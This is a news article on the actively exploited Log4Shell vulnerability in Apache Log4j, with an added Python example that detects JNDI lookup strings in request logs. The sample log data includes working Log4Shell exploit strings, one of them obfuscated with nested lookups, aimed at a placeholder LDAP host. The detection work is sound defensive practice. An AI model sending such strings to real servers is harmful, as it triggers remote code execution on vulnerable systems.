A newly discovered vulnerability in Log4j, dubbed “Log4Shell”, is being actively exploited. According to the information available so far, the threat actors are seeking to install cryptocurrency miners and Cobalt Strike, and to add infected devices to a botnet.
Tracked as CVE-2021-44228, the vulnerability has a CVSS score of 10.0 and concerns a remote code execution weakness in Apache Log4j, a widely used open-source Java logging framework for recording the events and messages generated by software applications.
The flaw has been ranked with the highest severity because, according to the details that have been revealed, anyone can take advantage of it by sending a specially crafted string that gets logged by Log4j version 2.0 or higher on a vulnerable server; this allows an attacker to execute code remotely on that server and gain control of it.
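The mechanism described above, that the attack arrives as a string which merely has to be logged, is also what makes it detectable in request logs. The following added example (not from the article or from any vendor advisory) scans constructed sample log lines for the JNDI lookup token, first collapsing the nested `${lower:…}`, `${upper:…}` and `${…:-…}` lookups that are commonly used to hide it; the log format and IP addresses are assumed for illustration.

```python
import re

# Constructed sample access-log lines (not from the article): a benign request,
# a plain JNDI lookup in the User-Agent field, and one that hides the "jndi"
# token behind nested Log4j lookups.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 '
    '"${${lower:j}${upper:n}di:${::-l}dap://example.invalid/b}"',
]

# ${lower:X} / ${upper:X} evaluate to X with the case changed.
_CASE_LOOKUP = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-X} evaluates to the default value X when "anything" is undefined.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# What remains after normalisation if the line carried a JNDI lookup.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _fold_case(match: re.Match) -> str:
    text = match.group(2)
    return text.lower() if match.group(1).lower() == "lower" else text.upper()


def normalize(text: str, max_rounds: int = 10) -> str:
    """Collapse innermost lookups that resolve to literal characters, repeating
    until nothing changes so deeper nesting is peeled away layer by layer."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(_fold_case, text)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == text:
            break
        text = new
    return text


def is_suspicious(line: str) -> bool:
    """True if the line contains a JNDI lookup, plain or obfuscated."""
    return _JNDI.search(normalize(line)) is not None


def find_suspicious(lines):
    """Return the subset of log lines that warrant investigation."""
    return [line for line in lines if is_suspicious(line)]


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG_LINES):
        print("suspicious:", hit)
```

A match is a signal to investigate, not proof of compromise: mass scanners send these strings indiscriminately, so the follow-up question is whether the receiving application logged the field with a vulnerable Log4j version.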
According to the most recent information, the vulnerability had been exploited for at least a week before it was made public on December 10. A number of companies have confirmed that their services are affected, indicating that the vulnerability reaches many more vendors than initially thought.
The earliest indication of Log4j exploitation dates to December 1, 2021, at 04:36:50 UTC, according to Cloudflare CEO Matthew Prince in a tweet published on Sunday. In an independent analysis, Cisco Talos said that it began detecting attacker activity connected to the flaw on December 2.
Vendors have also been forced to scramble for quick patches. Virtualization giant VMware has warned of “exploitation attempts in the wild”, adding that it is rolling out updates to its products. SonicWall, a provider of network security products, has also announced in an alert that its Email Security product is vulnerable and that it is working on a fix while investigating the rest of its portfolio.
The majority of the attacks so far have resulted from mass scanning by attackers trying to discover vulnerable systems. Once they have gained full access and control, attackers can perform a wide range of malicious tasks. According to a report published by Microsoft, this includes installing Cobalt Strike, which enables credential theft, running cryptocurrency miners, and exfiltrating data from the compromised workstations.
Unfortunately, this flaw has no specific target, and attackers are wreaking havoc on every vulnerable system they detect. This illustrates how an incident like this one, where a single vulnerability sits in a component incorporated into a great deal of software, can have very serious effects, enabling further attacks and exposing the affected systems to critical risk.